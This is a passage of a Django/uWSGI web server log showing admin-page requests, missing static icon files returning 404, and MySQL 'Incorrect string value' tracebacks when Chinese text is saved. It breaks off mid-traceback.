bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 695/916] 180.160.72.163 () {48 vars in 924 bytes} [Thu Jan 14 08:32:14 2021] POST /my-admin/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 696/917] 180.160.72.163 () {40 vars in 887 bytes} [Thu Jan 14 08:32:14 2021] GET /admin-home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 697/918] 180.160.72.163 () {40 vars in 889 bytes} [Thu Jan 14 08:32:14 2021] GET /admin-home/ => generated 6515 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: -1|req: -1/919] 180.160.72.163 () {38 vars in 823 bytes} [Thu Jan 14 08:32:14 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/920] 180.160.72.163 () {38 vars in 769 bytes} [Thu Jan 14 08:32:14 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/921] 180.160.72.163 () {38 vars in 757 bytes} [Thu Jan 14 08:32:14 2021] GET /static/css/style.css => generated 118751 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/922] 180.160.72.163 () {38 vars in 786 bytes} [Thu Jan 14 08:32:14 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/923] 180.160.72.163 () {38 vars in 798 bytes} [Thu Jan 14 08:32:14 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/924] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 08:32:14 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/925] 180.160.72.163 () {38 vars in 762 bytes} [Thu Jan 14 08:32:14 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/926] 180.160.72.163 () {38 vars in 738 bytes} [Thu Jan 14 08:32:15 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/927] 180.160.72.163 () {38 vars in 750 bytes} [Thu Jan 14 08:32:15 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/928] 180.160.72.163 () {38 vars in 826 bytes} [Thu Jan 14 08:32:15 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/929] 180.160.72.163 () {38 vars in 822 bytes} [Thu Jan 14 08:32:15 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/930] 180.160.72.163 () {38 vars in 748 bytes} [Thu Jan 14 08:32:15 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 698/931] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 08:32:16 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 699/932] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 08:32:16 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 700/933] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 08:32:16 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 701/934] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 08:32:16 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 702/935] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:16 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 703/936] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:16 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 704/937] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 08:32:16 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 705/938] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 08:32:16 2021] GET /static/css/spinners.css => generated 3516 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 706/939] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 08:32:16 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 707/940] 180.160.72.163 () {40 vars in 891 bytes} [Thu Jan 14 08:32:27 2021] GET /kind-manage => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 708/941] 180.160.72.163 () {40 vars in 893 bytes} [Thu Jan 14 08:32:27 2021] GET /kind-manage/ => generated 6423 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 709/942] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 08:32:27 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 710/943] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 08:32:27 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 711/944] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 08:32:27 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 712/945] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:27 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 713/946] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 08:32:27 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 714/947] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 08:32:27 2021] GET /static/css/spinners.css => generated 3516 bytes in 22 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 715/948] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:27 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 716/949] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 08:32:27 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 717/950] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 08:32:27 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: -1|req: -1/951] 180.160.72.163 () {38 vars in 751 bytes} [Thu Jan 14 08:32:27 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: 0|req: 719/952] 180.160.72.163 () {40 vars in 895 bytes} [Thu Jan 14 08:32:46 2021] GET /kind-manage/? => generated 6423 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 720/953] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 08:32:46 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 721/954] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:46 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 722/955] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 08:32:46 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 723/956] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 08:32:46 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 724/957] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 08:32:46 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 725/958] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:46 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1") +[pid: 2069|app: 0|req: 725/959] 180.160.72.163 () {48 vars in 977 bytes} [Thu Jan 14 08:32:46 2021] POST /kind-manage/ => generated 206907 bytes in 157 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 726/960] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 08:32:46 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 727/961] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 08:32:46 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 728/962] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 08:32:46 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 730/963] 180.160.72.163 () {40 vars in 896 bytes} [Thu Jan 14 08:32:49 2021] GET /kind-manage/? => generated 6423 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 730/964] 180.160.72.163 () {48 vars in 979 bytes} [Thu Jan 14 08:32:49 2021] POST /kind-manage/? => generated 27 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 731/965] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 08:32:49 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 732/966] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 08:32:49 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 733/967] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 08:32:49 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 734/968] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:49 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 735/969] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:49 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 736/970] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 08:32:49 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 737/971] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 08:32:49 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 738/972] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 08:32:49 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 739/973] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 08:32:49 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 740/974] 180.160.72.163 () {40 vars in 896 bytes} [Thu Jan 14 08:32:50 2021] GET /kind-manage/? => generated 7353 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 741/975] 180.160.72.163 () {48 vars in 979 bytes} [Thu Jan 14 08:32:50 2021] POST /kind-manage/? => generated 27 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 742/976] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 08:32:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 743/977] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 08:32:50 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 744/978] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 745/979] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 08:32:50 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 746/980] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 747/981] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 08:32:50 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 748/982] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 08:32:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 749/983] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 08:32:50 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 750/984] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 08:32:50 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[] +[pid: 2069|app: 0|req: 751/985] 180.160.72.163 () {40 vars in 889 bytes} [Thu Jan 14 08:32:54 2021] GET /all-3-0-0 => generated 8232 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/986] 180.160.72.163 () {38 vars in 760 bytes} [Thu Jan 14 08:32:55 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/987] 180.160.72.163 () {38 vars in 758 bytes} [Thu Jan 14 08:32:55 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: 0|req: 752/988] 180.160.72.163 () {40 vars in 1056 bytes} [Thu Jan 14 08:33:24 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: -1|req: -1/989] 180.160.72.163 () {42 vars in 1128 bytes} [Thu Jan 14 08:33:25 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/990] 180.160.72.163 () {42 vars in 1134 bytes} [Thu Jan 14 08:33:25 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File 